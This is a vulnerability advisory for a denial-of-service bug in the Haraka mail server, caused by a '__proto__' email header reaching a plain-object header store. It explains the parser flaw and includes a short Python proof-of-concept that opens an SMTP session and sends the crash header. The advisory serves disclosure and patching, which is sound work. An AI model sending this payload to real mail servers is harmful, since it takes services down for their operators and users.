Haraka affected by DoS via `__proto__` email header

Description

Summary

Sending an email with __proto__: as a header name crashes the Haraka worker process.

Details

The header parser at node_modules/haraka-email-message/lib/header.js:215-218 stores headers in a plain {} object:

_add_header(key, value, method) {
    this.headers[key] ??= []          // line 216
    this.headers[key][method](value)  // line 217
}

When key is __proto__:
1. this.headers['__proto__'] returns Object.prototype (the prototype getter)
2. Object.prototype is not null/undefined, so ??= is skipped
3. Object.prototype.push(value) throws TypeError: not a function

The TypeError reaches the global uncaughtException handler at haraka.js:26-33, which calls process.exit(1):

process.on('uncaughtException', (err) => {
    if (err.stack) {
        err.stack.split('\n').forEach((line) => logger.crit(line))
    } else {
        logger.crit(`Caught exception: ${JSON.stringify(err)}`)
    }
    logger.dump_and_exit(1)
})

PoC

import socket, time

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect(("127.0.0.1", 2525))
sock.recv(4096)
sock.sendall(b"EHLO evil\r\n"); sock.recv(4096)
sock.sendall(b"MAIL FROM:<[email protected]>\r\n"); sock.recv(4096)
sock.sendall(b"RCPT TO:<[email protected]>\r\n"); sock.recv(4096)
sock.sendall(b"DATA\r\n"); sock.recv(4096)
# Crash payload
sock.sendall(b"From: [email protected]\r\n__proto__: crash\r\n\r\nbody\r\n.\r\n")

Impact

In single-process mode (nodes=0), the entire server goes down. In cluster mode, the master restarts the worker, but all sessions are lost.

Basic information

Type
reviewed
Severity
high
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2026-04-01 22:56:09 UTC
Updated
2026-04-06 17:32:42 UTC
GitHub reviewed
2026-04-01 22:56:09 UTC
NVD published
2026-04-02

EPSS Score

Score Percentile
0.05% 16.47%

CVSS Scores

Base score Version Severity Vector
7.5 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:N)
No account or special rights needed—anonymous or random user is enough.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:N)
Doesn’t really leak secrets in a meaningful way.
Integrity (I:N)
Data isn’t meaningfully altered or forged.
Availability (A:H)
Could take the service down hard or make it unusable for people who depend on it.
8.7 4.0
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network.
Attack complexity (AC:L)
Exploitation conditions are straightforward and stable.
Attack requirements (AT:N)
No additional preconditions are required beyond normal reachability.
Privileges required (PR:N)
No privileges are required.
User interaction (UI:N)
No user interaction is required.
Vulnerable system confidentiality impact (VC:N)
No confidentiality impact on the vulnerable system.
Vulnerable system integrity impact (VI:N)
No integrity impact on the vulnerable system.
Vulnerable system availability impact (VA:H)
High availability impact on the vulnerable system.
Subsequent system confidentiality impact (SC:N)
No confidentiality impact on subsequent systems.
Subsequent system integrity impact (SI:N)
No integrity impact on subsequent systems.
Subsequent system availability impact (SA:N)
No availability impact on subsequent systems.

Identifiers

CWEs

CWE id Name
CWE-248 Uncaught Exception

Credits

  • sebastianosrt (reporter)
  • msimerson (remediation_developer)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
npm Haraka <= 3.1.3 3.1.4

References

cvelogic Threat Intelligence